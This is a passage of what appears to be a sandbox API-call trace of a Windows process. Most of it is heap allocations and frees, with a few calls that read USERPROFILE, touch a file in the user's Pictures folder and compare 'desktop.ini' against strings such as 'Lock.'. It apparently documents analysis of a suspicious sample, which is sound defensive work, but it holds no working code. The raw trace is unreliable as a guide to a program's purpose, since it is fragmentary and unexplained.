(lpFileName="C:\\Users\\FD1HVy\\Pictures\\D7Vw ag.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\d7vw ag.jpg")) returned 0xffffffff [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.602] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0209.602] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.602] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.602] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0209.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.603] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0209.603] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0209.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0209.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0209.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0209.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0209.605] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.605] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0209.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0209.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0209.606] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.606] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0209.606] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.606] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.607] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.607] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.608] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5b8 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.608] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.608] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0209.608] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719f8 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b88 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa708 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0209.609] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0209.609] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0209.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.610] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0209.610] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0209.610] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0209.611] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0209.611] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0209.611] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: 